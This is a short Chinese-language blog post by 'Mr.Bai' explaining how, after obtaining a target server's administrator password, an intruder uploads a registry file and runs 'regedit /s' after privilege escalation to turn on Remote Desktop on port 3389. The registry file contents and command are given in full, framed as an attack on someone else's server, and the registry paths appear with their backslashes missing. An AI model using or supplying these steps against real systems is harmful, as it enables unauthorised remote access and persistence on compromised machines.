当我们拿到管理员账号密码的时候,我们需要利用3389端口远程桌面连接到对方服务器,发现3389端口没有开放,此时需要我们远程开启目标服务器3389端口。
新建文件 3389.reg 内容如下:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] "fDenyTSConnections"=dword:00000000 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp] "PortNumber"=dword:00000D3D [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] "PortNumber"=dword:00000D3D
此时目标服务器 3389端口关闭:
上传3389.reg文件到目标服务器
提权之后运行一下 3389.reg 。 regedit /s C:/www/3389.reg
成功开启 3389端口。
本文作者为Mr.Bai,转载请注明。
